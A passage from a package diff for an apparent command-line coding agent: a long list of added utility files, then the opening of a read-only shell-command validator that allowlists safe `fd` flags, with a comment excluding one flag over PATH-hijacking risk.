  1566. package/dist/utils/computerUse/executor.js +411 -0
  1567. package/dist/utils/computerUse/gates.js +47 -0
  1568. package/dist/utils/computerUse/hostAdapter.js +56 -0
  1569. package/dist/utils/computerUse/inputLoader.js +12 -0
  1570. package/dist/utils/computerUse/mcpServer.js +72 -0
  1571. package/dist/utils/computerUse/setup.js +31 -0
  1572. package/dist/utils/computerUse/swiftLoader.js +10 -0
  1573. package/dist/utils/computerUse/toolRendering.js +93 -0
  1574. package/dist/utils/computerUse/wrapper.js +268 -0
  1575. package/dist/utils/concurrentSessions.js +127 -0
  1576. package/dist/utils/config.js +930 -0
  1577. package/dist/utils/configConstants.js +16 -0
  1578. package/dist/utils/contentArray.js +22 -0
  1579. package/dist/utils/context.js +151 -0
  1580. package/dist/utils/contextAnalysis.js +192 -0
  1581. package/dist/utils/contextSuggestions.js +148 -0
  1582. package/dist/utils/controlMessageCompat.js +19 -0
  1583. package/dist/utils/conversationRecovery.js +324 -0
  1584. package/dist/utils/cron.js +180 -0
  1585. package/dist/utils/cronJitterConfig.js +31 -0
  1586. package/dist/utils/cronScheduler.js +325 -0
  1587. package/dist/utils/cronTasks.js +194 -0
  1588. package/dist/utils/cronTasksLock.js +127 -0
  1589. package/dist/utils/crossProjectResume.js +41 -0
  1590. package/dist/utils/crypto.js +4 -0
  1591. package/dist/utils/cwd.js +21 -0
  1592. package/dist/utils/debug.js +192 -0
  1593. package/dist/utils/debugFilter.js +79 -0
  1594. package/dist/utils/deepLink/banner.js +55 -0
  1595. package/dist/utils/deepLink/parseDeepLink.js +99 -0
  1596. package/dist/utils/deepLink/protocolHandler.js +74 -0
  1597. package/dist/utils/deepLink/registerProtocol.js +270 -0
  1598. package/dist/utils/deepLink/terminalLauncher.js +353 -0
  1599. package/dist/utils/deepLink/terminalPreference.js +25 -0
  1600. package/dist/utils/desktopDeepLink.js +188 -0
  1601. package/dist/utils/detectRepository.js +102 -0
  1602. package/dist/utils/diagLogs.js +51 -0
  1603. package/dist/utils/diff.js +127 -0
  1604. package/dist/utils/directMemberMessage.js +34 -0
  1605. package/dist/utils/displayTags.js +17 -0
  1606. package/dist/utils/doctorContextWarnings.js +164 -0
  1607. package/dist/utils/doctorDiagnostic.js +415 -0
  1608. package/dist/utils/dxt/helpers.js +44 -0
  1609. package/dist/utils/dxt/zip.js +123 -0
  1610. package/dist/utils/earlyInput.js +104 -0
  1611. package/dist/utils/editor.js +108 -0
  1612. package/dist/utils/effort.js +209 -0
  1613. package/dist/utils/embeddedTools.js +13 -0
  1614. package/dist/utils/env.js +240 -0
  1615. package/dist/utils/envDynamic.js +99 -0
  1616. package/dist/utils/envUtils.js +111 -0
  1617. package/dist/utils/envValidation.js +29 -0
  1618. package/dist/utils/errorLogSink.js +149 -0
  1619. package/dist/utils/errors.js +128 -0
  1620. package/dist/utils/exampleCommands.js +138 -0
  1621. package/dist/utils/execFileNoThrow.js +92 -0
  1622. package/dist/utils/execFileNoThrowPortable.js +101 -0
  1623. package/dist/utils/execSyncWrapper.js +63 -0
  1624. package/dist/utils/exportRenderer.js +54 -0
  1625. package/dist/utils/extraUsage.js +15 -0
  1626. package/dist/utils/fastMode.js +367 -0
  1627. package/dist/utils/file.js +353 -0
  1628. package/dist/utils/fileHistory.js +750 -0
  1629. package/dist/utils/fileOperationAnalytics.js +26 -0
  1630. package/dist/utils/filePersistence/filePersistence.js +190 -0
  1631. package/dist/utils/filePersistence/outputsScanner.js +81 -0
  1632. package/dist/utils/filePersistence/types.js +8 -0
  1633. package/dist/utils/fileRead.js +55 -0
  1634. package/dist/utils/fileReadCache.js +67 -0
  1635. package/dist/utils/fileStateCache.js +87 -0
  1636. package/dist/utils/findExecutable.js +8 -0
  1637. package/dist/utils/fingerprint.js +36 -0
  1638. package/dist/utils/forkedAgent.js +318 -0
  1639. package/dist/utils/format.js +211 -0
  1640. package/dist/utils/formatBriefTimestamp.js +52 -0
  1641. package/dist/utils/fpsTracker.js +35 -0
  1642. package/dist/utils/frontmatterParser.js +172 -0
  1643. package/dist/utils/fsOperations.js +619 -0
  1644. package/dist/utils/fullscreen.js +90 -0
  1645. package/dist/utils/generatedFiles.js +115 -0
  1646. package/dist/utils/generators.js +67 -0
  1647. package/dist/utils/genericProcessUtils.js +108 -0
  1648. package/dist/utils/getWorktreePaths.js +38 -0
  1649. package/dist/utils/getWorktreePathsPortable.js +19 -0
  1650. package/dist/utils/ghPrStatus.js +55 -0
  1651. package/dist/utils/git/gitConfigParser.js +168 -0
  1652. package/dist/utils/git/gitFilesystem.js +454 -0
  1653. package/dist/utils/git/gitignore.js +61 -0
  1654. package/dist/utils/git.js +617 -0
  1655. package/dist/utils/gitDiff.js +313 -0
  1656. package/dist/utils/gitSettings.js +11 -0
  1657. package/dist/utils/github/ghAuthStatus.js +18 -0
  1658. package/dist/utils/githubRepoPathMapping.js +103 -0
  1659. package/dist/utils/glob.js +128 -0
  1660. package/dist/utils/gracefulShutdown.js +303 -0
  1661. package/dist/utils/groupToolUses.js +114 -0
  1662. package/dist/utils/handlePromptSubmit.js +355 -0
  1663. package/dist/utils/hash.js +26 -0
  1664. package/dist/utils/headlessProfiler.js +99 -0
  1665. package/dist/utils/heapDumpService.js +175 -0
  1666. package/dist/utils/heatmap.js +120 -0
  1667. package/dist/utils/highlightMatch.js +22 -0
  1668. package/dist/utils/hooks/AsyncHookRegistry.js +231 -0
  1669. package/dist/utils/hooks/apiQueryHookHelper.js +76 -0
  1670. package/dist/utils/hooks/execAgentHook.js +254 -0
  1671. package/dist/utils/hooks/execHttpHook.js +132 -0
  1672. package/dist/utils/hooks/execPromptHook.js +166 -0
  1673. package/dist/utils/hooks/fileChangedWatcher.js +154 -0
  1674. package/dist/utils/hooks/hookEvents.js +99 -0
  1675. package/dist/utils/hooks/hookHelpers.js +60 -0
  1676. package/dist/utils/hooks/hooksConfigManager.js +319 -0
  1677. package/dist/utils/hooks/hooksConfigSnapshot.js +60 -0
  1678. package/dist/utils/hooks/hooksSettings.js +187 -0
  1679. package/dist/utils/hooks/postSamplingHooks.js +31 -0
  1680. package/dist/utils/hooks/registerFrontmatterHooks.js +41 -0
  1681. package/dist/utils/hooks/registerSkillHooks.js +38 -0
  1682. package/dist/utils/hooks/sessionHooks.js +206 -0
  1683. package/dist/utils/hooks/skillImprovement.js +209 -0
  1684. package/dist/utils/hooks/ssrfGuard.js +158 -0
  1685. package/dist/utils/hooks.js +3203 -0
  1686. package/dist/utils/horizontalScroll.js +73 -0
  1687. package/dist/utils/http.js +84 -0
  1688. package/dist/utils/hyperlink.js +18 -0
  1689. package/dist/utils/iTermBackup.js +57 -0
  1690. package/dist/utils/ide.js +1042 -0
  1691. package/dist/utils/idePathConversion.js +54 -0
  1692. package/dist/utils/idleTimeout.js +36 -0
  1693. package/dist/utils/imagePaste.js +262 -0
  1694. package/dist/utils/imageResizer.js +493 -0
  1695. package/dist/utils/imageStore.js +120 -0
  1696. package/dist/utils/imageValidation.js +57 -0
  1697. package/dist/utils/immediateCommand.js +7 -0
  1698. package/dist/utils/inProcessTeammateHelpers.js +34 -0
  1699. package/dist/utils/ink.js +17 -0
  1700. package/dist/utils/intl.js +68 -0
  1701. package/dist/utils/jetbrains.js +149 -0
  1702. package/dist/utils/json.js +231 -0
  1703. package/dist/utils/jsonRead.js +7 -0
  1704. package/dist/utils/keyboardShortcuts.js +15 -0
  1705. package/dist/utils/lazySchema.js +7 -0
  1706. package/dist/utils/listSessionsImpl.js +219 -0
  1707. package/dist/utils/localInstaller.js +107 -0
  1708. package/dist/utils/lockfile.js +40 -0
  1709. package/dist/utils/log.js +201 -0
  1710. package/dist/utils/logoV2Utils.js +214 -0
  1711. package/dist/utils/mailbox.js +52 -0
  1712. package/dist/utils/managedEnv.js +96 -0
  1713. package/dist/utils/managedEnvConstants.js +156 -0
  1714. package/dist/utils/markdown.js +253 -0
  1715. package/dist/utils/markdownConfigLoader.js +340 -0
  1716. package/dist/utils/mcp/dateTimeParser.js +77 -0
  1717. package/dist/utils/mcp/elicitationValidation.js +231 -0
  1718. package/dist/utils/mcpInstructionsDelta.js +69 -0
  1719. package/dist/utils/mcpOutputStorage.js +125 -0
  1720. package/dist/utils/mcpValidation.js +150 -0
  1721. package/dist/utils/mcpWebSocketTransport.js +168 -0
  1722. package/dist/utils/memcodeDesktop.js +115 -0
  1723. package/dist/utils/memcodeHints.js +95 -0
  1724. package/dist/utils/memcodeInChrome/chromeNativeHost.js +388 -0
  1725. package/dist/utils/memcodeInChrome/common.js +442 -0
  1726. package/dist/utils/memcodeInChrome/mcpServer.js +263 -0
  1727. package/dist/utils/memcodeInChrome/prompt.js +67 -0
  1728. package/dist/utils/memcodeInChrome/setup.js +305 -0
  1729. package/dist/utils/memcodeInChrome/setupPortable.js +151 -0
  1730. package/dist/utils/memcodeInChrome/toolRendering.js +214 -0
  1731. package/dist/utils/memcodemd.js +938 -0
  1732. package/dist/utils/memoize.js +130 -0
  1733. package/dist/utils/memory/types.js +12 -0
  1734. package/dist/utils/memory/versions.js +7 -0
  1735. package/dist/utils/memoryFileDetection.js +167 -0
  1736. package/dist/utils/messagePredicates.js +6 -0
  1737. package/dist/utils/messageQueueManager.js +307 -0
  1738. package/dist/utils/messages/mappers.js +215 -0
  1739. package/dist/utils/messages/systemInit.js +55 -0
  1740. package/dist/utils/messages.js +3754 -0
  1741. package/dist/utils/model/agent.js +95 -0
  1742. package/dist/utils/model/aliases.js +48 -0
  1743. package/dist/utils/model/antModels.js +33 -0
  1744. package/dist/utils/model/bedrock.js +170 -0
  1745. package/dist/utils/model/check1mAccess.js +55 -0
  1746. package/dist/utils/model/configs.js +142 -0
  1747. package/dist/utils/model/contextWindowUpgradeCheck.js +34 -0
  1748. package/dist/utils/model/deprecation.js +59 -0
  1749. package/dist/utils/model/model.js +523 -0
  1750. package/dist/utils/model/modelAllowlist.js +94 -0
  1751. package/dist/utils/model/modelCapabilities.js +102 -0
  1752. package/dist/utils/model/modelOptions.js +570 -0
  1753. package/dist/utils/model/modelStrings.js +120 -0
  1754. package/dist/utils/model/modelSupportOverrides.js +36 -0
  1755. package/dist/utils/model/providers.js +48 -0
  1756. package/dist/utils/model/validateModel.js +111 -0
  1757. package/dist/utils/modelCost.js +158 -0
  1758. package/dist/utils/modelPricingTable.js +86 -0
  1759. package/dist/utils/modifiers.js +26 -0
  1760. package/dist/utils/mtls.js +120 -0
  1761. package/dist/utils/nativeInstaller/download.js +387 -0
  1762. package/dist/utils/nativeInstaller/index.js +22 -0
  1763. package/dist/utils/nativeInstaller/installer.js +1254 -0
  1764. package/dist/utils/nativeInstaller/packageManagers.js +192 -0
  1765. package/dist/utils/nativeInstaller/pidLock.js +252 -0
  1766. package/dist/utils/notebook.js +176 -0
  1767. package/dist/utils/objectGroupBy.js +15 -0
  1768. package/dist/utils/pasteStore.js +68 -0
  1769. package/dist/utils/path.js +76 -0
  1770. package/dist/utils/pdf.js +205 -0
  1771. package/dist/utils/pdfUtils.js +42 -0
  1772. package/dist/utils/peerAddress.js +9 -0
  1773. package/dist/utils/permissions/PermissionMode.js +102 -0
  1774. package/dist/utils/permissions/PermissionPromptToolResultSchema.js +87 -0
  1775. package/dist/utils/permissions/PermissionResult.js +13 -0
  1776. package/dist/utils/permissions/PermissionRule.js +15 -0
  1777. package/dist/utils/permissions/PermissionUpdate.js +271 -0
  1778. package/dist/utils/permissions/PermissionUpdateSchema.js +62 -0
  1779. package/dist/utils/permissions/autoModeState.js +35 -0
  1780. package/dist/utils/permissions/bashClassifier.js +40 -0
  1781. package/dist/utils/permissions/bypassPermissionsKillswitch.js +114 -0
  1782. package/dist/utils/permissions/classifierDecision.js +83 -0
  1783. package/dist/utils/permissions/classifierShared.js +18 -0
  1784. package/dist/utils/permissions/dangerousPatterns.js +64 -0
  1785. package/dist/utils/permissions/denialTracking.js +34 -0
  1786. package/dist/utils/permissions/filesystem.js +1046 -0
  1787. package/dist/utils/permissions/getNextPermissionMode.js +33 -0
  1788. package/dist/utils/permissions/pathValidation.js +284 -0
  1789. package/dist/utils/permissions/permissionExplainer.js +172 -0
  1790. package/dist/utils/permissions/permissionRuleParser.js +98 -0
  1791. package/dist/utils/permissions/permissionSetup.js +905 -0
  1792. package/dist/utils/permissions/permissions.js +939 -0
  1793. package/dist/utils/permissions/permissionsLoader.js +174 -0
  1794. package/dist/utils/permissions/shadowedRuleDetection.js +89 -0
  1795. package/dist/utils/permissions/shellRuleMatching.js +119 -0
  1796. package/dist/utils/permissions/yolo-classifier-prompts/auto_mode_system_prompt.txt +5 -0
  1797. package/dist/utils/permissions/yolo-classifier-prompts/permissions_anthropic.txt +11 -0
  1798. package/dist/utils/permissions/yolo-classifier-prompts/permissions_external.txt +14 -0
  1799. package/dist/utils/permissions/yoloClassifier.js +945 -0
  1800. package/dist/utils/planModeV2.js +56 -0
  1801. package/dist/utils/plans.js +255 -0
  1802. package/dist/utils/platform.js +115 -0
  1803. package/dist/utils/plugins/addDirPluginSettings.js +34 -0
  1804. package/dist/utils/plugins/cacheUtils.js +151 -0
  1805. package/dist/utils/plugins/dependencyResolver.js +124 -0
  1806. package/dist/utils/plugins/fetchTelemetry.js +70 -0
  1807. package/dist/utils/plugins/gitAvailability.js +23 -0
  1808. package/dist/utils/plugins/headlessPluginInstall.js +107 -0
  1809. package/dist/utils/plugins/hintRecommendation.js +100 -0
  1810. package/dist/utils/plugins/installCounts.js +166 -0
  1811. package/dist/utils/plugins/installedPluginsManager.js +728 -0
  1812. package/dist/utils/plugins/loadPluginAgents.js +270 -0
  1813. package/dist/utils/plugins/loadPluginCommands.js +706 -0
  1814. package/dist/utils/plugins/loadPluginHooks.js +186 -0
  1815. package/dist/utils/plugins/loadPluginOutputStyles.js +143 -0
  1816. package/dist/utils/plugins/lspPluginIntegration.js +235 -0
  1817. package/dist/utils/plugins/lspRecommendation.js +212 -0
  1818. package/dist/utils/plugins/managedPlugins.js +21 -0
  1819. package/dist/utils/plugins/marketplaceHelpers.js +328 -0
  1820. package/dist/utils/plugins/marketplaceManager.js +1595 -0
  1821. package/dist/utils/plugins/mcpPluginIntegration.js +395 -0
  1822. package/dist/utils/plugins/mcpbHandler.js +568 -0
  1823. package/dist/utils/plugins/officialMarketplace.js +14 -0
  1824. package/dist/utils/plugins/officialMarketplaceGcs.js +126 -0
  1825. package/dist/utils/plugins/officialMarketplaceStartupCheck.js +296 -0
  1826. package/dist/utils/plugins/orphanedPluginFilter.js +55 -0
  1827. package/dist/utils/plugins/parseMarketplaceInput.js +82 -0
  1828. package/dist/utils/plugins/performStartupChecks.js +36 -0
  1829. package/dist/utils/plugins/pluginAutoupdate.js +160 -0
  1830. package/dist/utils/plugins/pluginBlocklist.js +78 -0
  1831. package/dist/utils/plugins/pluginDirectories.js +87 -0
  1832. package/dist/utils/plugins/pluginFlagging.js +129 -0
  1833. package/dist/utils/plugins/pluginIdentifier.js +45 -0
  1834. package/dist/utils/plugins/pluginInstallationHelpers.js +329 -0
  1835. package/dist/utils/plugins/pluginLoader.js +2114 -0
  1836. package/dist/utils/plugins/pluginOptionsStorage.js +206 -0
  1837. package/dist/utils/plugins/pluginPolicy.js +8 -0
  1838. package/dist/utils/plugins/pluginStartupCheck.js +200 -0
  1839. package/dist/utils/plugins/pluginVersioning.js +67 -0
  1840. package/dist/utils/plugins/reconciler.js +143 -0
  1841. package/dist/utils/plugins/refresh.js +107 -0
  1842. package/dist/utils/plugins/schemas.js +723 -0
  1843. package/dist/utils/plugins/validatePlugin.js +620 -0
  1844. package/dist/utils/plugins/walkPluginMarkdown.js +42 -0
  1845. package/dist/utils/plugins/zipCache.js +236 -0
  1846. package/dist/utils/plugins/zipCacheAdapters.js +109 -0
  1847. package/dist/utils/powershell/dangerousCmdlets.js +127 -0
  1848. package/dist/utils/powershell/parser.js +1049 -0
  1849. package/dist/utils/powershell/staticPrefix.js +146 -0
  1850. package/dist/utils/preflightChecks.js +160 -0
  1851. package/dist/utils/privacyLevel.js +27 -0
  1852. package/dist/utils/process.js +52 -0
  1853. package/dist/utils/processUserInput/processBashCommand.js +103 -0
  1854. package/dist/utils/processUserInput/processSlashCommand.js +724 -0
  1855. package/dist/utils/processUserInput/processTextPrompt.js +57 -0
  1856. package/dist/utils/processUserInput/processUserInput.js +379 -0
  1857. package/dist/utils/profilerBase.js +20 -0
  1858. package/dist/utils/promptCategory.js +25 -0
  1859. package/dist/utils/promptEditor.js +123 -0
  1860. package/dist/utils/promptShellExecution.js +98 -0
  1861. package/dist/utils/protectedNamespace.js +6 -0
  1862. package/dist/utils/proxy.js +247 -0
  1863. package/dist/utils/queryContext.js +98 -0
  1864. package/dist/utils/queryHelpers.js +350 -0
  1865. package/dist/utils/queryProfiler.js +195 -0
  1866. package/dist/utils/queueProcessor.js +47 -0
  1867. package/dist/utils/readEditContext.js +147 -0
  1868. package/dist/utils/readFileInRange.js +231 -0
  1869. package/dist/utils/releaseNotes.js +205 -0
  1870. package/dist/utils/renderOptions.js +68 -0
  1871. package/dist/utils/renderProbe.js +77 -0
  1872. package/dist/utils/ripgrep.js +431 -0
  1873. package/dist/utils/sandbox/sandbox-adapter.js +529 -0
  1874. package/dist/utils/sandbox/sandbox-ui-utils.js +6 -0
  1875. package/dist/utils/sanitization.js +39 -0
  1876. package/dist/utils/screenshotClipboard.js +89 -0
  1877. package/dist/utils/sdkEventQueue.js +41 -0
  1878. package/dist/utils/secureStorage/fallbackStorage.js +48 -0
  1879. package/dist/utils/secureStorage/index.js +12 -0
  1880. package/dist/utils/secureStorage/keychainPrefetch.js +54 -0
  1881. package/dist/utils/secureStorage/macOsKeychainHelpers.js +50 -0
  1882. package/dist/utils/secureStorage/macOsKeychainStorage.js +175 -0
  1883. package/dist/utils/secureStorage/plainTextStorage.js +80 -0
  1884. package/dist/utils/semanticBoolean.js +10 -0
  1885. package/dist/utils/semanticNumber.js +13 -0
  1886. package/dist/utils/semver.js +51 -0
  1887. package/dist/utils/sequential.js +31 -0
  1888. package/dist/utils/sessionActivity.js +102 -0
  1889. package/dist/utils/sessionEnvVars.js +19 -0
  1890. package/dist/utils/sessionEnvironment.js +137 -0
  1891. package/dist/utils/sessionFileAccessHooks.js +173 -0
  1892. package/dist/utils/sessionIngressAuth.js +93 -0
  1893. package/dist/utils/sessionRestore.js +261 -0
  1894. package/dist/utils/sessionStart.js +147 -0
  1895. package/dist/utils/sessionState.js +57 -0
  1896. package/dist/utils/sessionStorage.js +3157 -0
  1897. package/dist/utils/sessionStoragePortable.js +506 -0
  1898. package/dist/utils/sessionTime.js +11 -0
  1899. package/dist/utils/sessionTitle.js +91 -0
  1900. package/dist/utils/sessionUrl.js +37 -0
  1901. package/dist/utils/set.js +44 -0
  1902. package/dist/utils/settings/allErrors.js +14 -0
  1903. package/dist/utils/settings/applySettingsChange.js +51 -0
  1904. package/dist/utils/settings/changeDetector.js +294 -0
  1905. package/dist/utils/settings/constants.js +137 -0
  1906. package/dist/utils/settings/internalWrites.js +20 -0
  1907. package/dist/utils/settings/managedPath.js +23 -0
  1908. package/dist/utils/settings/mdm/constants.js +49 -0
  1909. package/dist/utils/settings/mdm/rawRead.js +90 -0
  1910. package/dist/utils/settings/mdm/settings.js +182 -0
  1911. package/dist/utils/settings/permissionValidation.js +175 -0
  1912. package/dist/utils/settings/pluginOnlyPolicy.js +21 -0
  1913. package/dist/utils/settings/schemaOutput.js +10 -0
  1914. package/dist/utils/settings/settings.js +682 -0
  1915. package/dist/utils/settings/settingsCache.js +48 -0
  1916. package/dist/utils/settings/toolValidationConfig.js +69 -0
  1917. package/dist/utils/settings/types.js +528 -0
  1918. package/dist/utils/settings/validateEditTool.js +29 -0
  1919. package/dist/utils/settings/validation.js +155 -0
  1920. package/dist/utils/settings/validationTips.js +103 -0
  1921. package/dist/utils/shell/bashProvider.js +141 -0
  1922. package/dist/utils/shell/outputLimits.js +17 -0
  1923. package/dist/utils/shell/powershellDetection.js +55 -0
  1924. package/dist/utils/shell/powershellProvider.js +54 -0
  1925. package/dist/utils/shell/prefix.js +227 -0
  1926. package/dist/utils/shell/readOnlyCommandValidation.js +1796 -0
  1927. package/dist/utils/shell/resolveDefaultShell.js +7 -0
  1928. package/dist/utils/shell/shellProvider.js +6 -0
  1929. package/dist/utils/shell/shellToolUtils.js +13 -0
  1930. package/dist/utils/shell/specPrefix.js +149 -0
  1931. package/dist/utils/shellConfig.js +93 -0
  1932. package/dist/utils/sideQuery.js +113 -0
  1933. package/dist/utils/sideQuestion.js +88 -0
  1934. package/dist/utils/signal.js +20 -0
  1935. package/dist/utils/sinks.js +9 -0
  1936. package/dist/utils/skills/skillChangeDetector.js +199 -0
  1937. package/dist/utils/slashCommandParsing.js +28 -0
  1938. package/dist/utils/sleep.js +51 -0
  1939. package/dist/utils/sliceAnsi.js +49 -0
  1940. package/dist/utils/slowOperations.js +220 -0
  1941. package/dist/utils/standaloneAgent.js +10 -0
  1942. package/dist/utils/startupProfiler.js +146 -0
  1943. package/dist/utils/staticRender.js +77 -0
  1944. package/dist/utils/stats.js +667 -0
  1945. package/dist/utils/statsCache.js +277 -0
  1946. package/dist/utils/status.js +366 -0
  1947. package/dist/utils/statusNoticeDefinitions.js +196 -0
  1948. package/dist/utils/statusNoticeHelpers.js +13 -0
  1949. package/dist/utils/stream.js +75 -0
  1950. package/dist/utils/streamJsonStdoutGuard.js +79 -0
  1951. package/dist/utils/streamlinedTransform.js +137 -0
  1952. package/dist/utils/stringUtils.js +143 -0
  1953. package/dist/utils/subprocessEnv.js +55 -0
  1954. package/dist/utils/suggestions/commandSuggestions.js +374 -0
  1955. package/dist/utils/suggestions/directoryCompletion.js +141 -0
  1956. package/dist/utils/suggestions/shellHistoryCompletion.js +70 -0
  1957. package/dist/utils/suggestions/skillUsageTracking.js +36 -0
  1958. package/dist/utils/suggestions/slackChannelSuggestions.js +151 -0
  1959. package/dist/utils/swarm/It2SetupPrompt.js +409 -0
  1960. package/dist/utils/swarm/backends/ITermBackend.js +224 -0
  1961. package/dist/utils/swarm/backends/InProcessBackend.js +256 -0
  1962. package/dist/utils/swarm/backends/PaneBackendExecutor.js +253 -0
  1963. package/dist/utils/swarm/backends/TmuxBackend.js +556 -0
  1964. package/dist/utils/swarm/backends/detection.js +53 -0
  1965. package/dist/utils/swarm/backends/it2Setup.js +152 -0
  1966. package/dist/utils/swarm/backends/registry.js +270 -0
  1967. package/dist/utils/swarm/backends/teammateModeSnapshot.js +50 -0
  1968. package/dist/utils/swarm/backends/types.js +6 -0
  1969. package/dist/utils/swarm/constants.js +22 -0
  1970. package/dist/utils/swarm/inProcessRunner.js +1060 -0
  1971. package/dist/utils/swarm/leaderPermissionBridge.js +28 -0
  1972. package/dist/utils/swarm/permissionSync.js +596 -0
  1973. package/dist/utils/swarm/reconnection.js +75 -0
  1974. package/dist/utils/swarm/spawnInProcess.js +184 -0
  1975. package/dist/utils/swarm/spawnUtils.js +96 -0
  1976. package/dist/utils/swarm/teamHelpers.js +407 -0
  1977. package/dist/utils/swarm/teammateInit.js +90 -0
  1978. package/dist/utils/swarm/teammateLayoutManager.js +49 -0
  1979. package/dist/utils/swarm/teammateModel.js +11 -0
  1980. package/dist/utils/swarm/teammatePromptAddendum.js +14 -0
  1981. package/dist/utils/systemDirectories.js +45 -0
  1982. package/dist/utils/systemPrompt.js +74 -0
  1983. package/dist/utils/systemPromptType.js +6 -0
  1984. package/dist/utils/systemTheme.js +63 -0
  1985. package/dist/utils/taggedId.js +30 -0
  1986. package/dist/utils/task/TaskOutput.js +298 -0
  1987. package/dist/utils/task/diskOutput.js +310 -0
  1988. package/dist/utils/task/framework.js +189 -0
  1989. package/dist/utils/task/outputFormatting.js +32 -0
  1990. package/dist/utils/task/sdkProgress.js +21 -0
  1991. package/dist/utils/taskSummary.js +9 -0
  1992. package/dist/utils/tasks.js +544 -0
  1993. package/dist/utils/teamDiscovery.js +36 -0
  1994. package/dist/utils/teamMemoryOps.js +48 -0
  1995. package/dist/utils/teammate.js +144 -0
  1996. package/dist/utils/teammateContext.js +23 -0
  1997. package/dist/utils/teammateMailbox.js +661 -0
  1998. package/dist/utils/telemetry/betaSessionTracing.js +270 -0
  1999. package/dist/utils/telemetry/bigqueryExporter.js +174 -0
  2000. package/dist/utils/telemetry/events.js +55 -0
  2001. package/dist/utils/telemetry/instrumentation.js +602 -0
  2002. package/dist/utils/telemetry/logger.js +28 -0
  2003. package/dist/utils/telemetry/perfettoTracing.js +716 -0
  2004. package/dist/utils/telemetry/pluginTelemetry.js +119 -0
  2005. package/dist/utils/telemetry/sessionTracing.js +646 -0
  2006. package/dist/utils/telemetry/skillLoadedEvent.js +26 -0
  2007. package/dist/utils/telemetryAttributes.js +51 -0
  2008. package/dist/utils/teleport/api.js +282 -0
  2009. package/dist/utils/teleport/environmentSelection.js +47 -0
  2010. package/dist/utils/teleport/environments.js +86 -0
  2011. package/dist/utils/teleport/gitBundle.js +201 -0
  2012. package/dist/utils/teleport.js +857 -0
  2013. package/dist/utils/tempfile.js +10 -0
  2014. package/dist/utils/terminal.js +72 -0
  2015. package/dist/utils/terminalPanel.js +157 -0
  2016. package/dist/utils/textHighlighting.js +111 -0
  2017. package/dist/utils/theme.js +698 -0
  2018. package/dist/utils/thinking.js +135 -0
  2019. package/dist/utils/timeouts.js +26 -0
  2020. package/dist/utils/tmuxSocket.js +250 -0
  2021. package/dist/utils/todo/types.js +17 -0
  2022. package/dist/utils/tokenBudget.js +58 -0
  2023. package/dist/utils/tokens.js +133 -0
  2024. package/dist/utils/toolErrors.js +99 -0
  2025. package/dist/utils/toolExposurePlanner.js +62 -0
  2026. package/dist/utils/toolPool.js +40 -0
  2027. package/dist/utils/toolResultStorage.js +498 -0
  2028. package/dist/utils/toolSchemaCache.js +11 -0
  2029. package/dist/utils/toolSearch.js +356 -0
  2030. package/dist/utils/transcriptSearch.js +136 -0
  2031. package/dist/utils/treeify.js +102 -0
  2032. package/dist/utils/truncate.js +109 -0
  2033. package/dist/utils/udsMessaging.js +15 -0
  2034. package/dist/utils/ultraplan/ccrSession.js +211 -0
  2035. package/dist/utils/ultraplan/keyword.js +78 -0
  2036. package/dist/utils/ultraplan/prompt.txt +1 -0
  2037. package/dist/utils/unaryLogging.js +18 -0
  2038. package/dist/utils/undercover.js +58 -0
  2039. package/dist/utils/user.js +122 -0
  2040. package/dist/utils/userAgent.js +7 -0
  2041. package/dist/utils/userPromptKeywords.js +17 -0
  2042. package/dist/utils/uuid.js +14 -0
  2043. package/dist/utils/warningHandler.js +80 -0
  2044. package/dist/utils/which.js +54 -0
  2045. package/dist/utils/windowsPaths.js +126 -0
  2046. package/dist/utils/withResolvers.js +12 -0
  2047. package/dist/utils/words.js +774 -0
  2048. package/dist/utils/workloadContext.js +14 -0
  2049. package/dist/utils/worktree.js +1057 -0
  2050. package/dist/utils/worktreeModeEnabled.js +6 -0
  2051. package/dist/utils/xdg.js +30 -0
  2052. package/dist/utils/xmem.js +263 -0
  2053. package/dist/utils/xmemActivity.js +121 -0
  2054. package/dist/utils/xmemSessionSummary.js +40 -0
  2055. package/dist/utils/xml.js +10 -0
  2056. package/dist/utils/yaml.js +9 -0
  2057. package/dist/utils/zodToJsonSchema.js +12 -0
  2058. package/dist/vim/motions.js +58 -0
  2059. package/dist/vim/operators.js +327 -0
  2060. package/dist/vim/textObjects.js +125 -0
  2061. package/dist/vim/transitions.js +318 -0
  2062. package/dist/vim/types.js +81 -0
  2063. package/dist/voice/voiceModeEnabled.js +16 -0
  2064. package/entrypoints/cli.tsx +421 -0
  2065. package/package.json +168 -0
  2066. package/scripts/postinstall.js +222 -0
@@ -0,0 +1,1727 @@
1
+ import { getOriginalCwd } from "../../bootstrap/state.js";
2
+ import {
3
+ extractOutputRedirections,
4
+ splitCommand_DEPRECATED
5
+ } from "../../utils/bash/commands.js";
6
+ import { tryParseShellCommand } from "../../utils/bash/shellQuote.js";
7
+ import { getCwd } from "../../utils/cwd.js";
8
+ import { isCurrentDirectoryBareGitRepo } from "../../utils/git.js";
9
+ import { getPlatform } from "../../utils/platform.js";
10
+ import { SandboxManager } from "../../utils/sandbox/sandbox-adapter.js";
11
+ import {
12
+ containsVulnerableUncPath,
13
+ DOCKER_READ_ONLY_COMMANDS,
14
+ EXTERNAL_READONLY_COMMANDS,
15
+ GH_READ_ONLY_COMMANDS,
16
+ GIT_READ_ONLY_COMMANDS,
17
+ PYRIGHT_READ_ONLY_COMMANDS,
18
+ RIPGREP_READ_ONLY_COMMANDS,
19
+ validateFlags
20
+ } from "../../utils/shell/readOnlyCommandValidation.js";
21
+ import { isNormalizedGitCommand } from "./bashPermissions.js";
22
+ import { bashCommandIsSafe_DEPRECATED } from "./bashSecurity.js";
23
+ import {
24
+ COMMAND_OPERATION_TYPE,
25
+ PATH_EXTRACTORS
26
+ } from "./pathValidation.js";
27
+ import { sedCommandIsAllowedByAllowlist } from "./sedValidation.js";
28
+ const FD_SAFE_FLAGS = {
29
+ "-h": "none",
30
+ "--help": "none",
31
+ "-V": "none",
32
+ "--version": "none",
33
+ "-H": "none",
34
+ "--hidden": "none",
35
+ "-I": "none",
36
+ "--no-ignore": "none",
37
+ "--no-ignore-vcs": "none",
38
+ "--no-ignore-parent": "none",
39
+ "-s": "none",
40
+ "--case-sensitive": "none",
41
+ "-i": "none",
42
+ "--ignore-case": "none",
43
+ "-g": "none",
44
+ "--glob": "none",
45
+ "--regex": "none",
46
+ "-F": "none",
47
+ "--fixed-strings": "none",
48
+ "-a": "none",
49
+ "--absolute-path": "none",
50
+ // SECURITY: -l/--list-details EXCLUDED — internally executes `ls` as subprocess (same
51
+ // pathway as --exec-batch). PATH hijacking risk if malicious `ls` is on PATH.
52
+ "-L": "none",
53
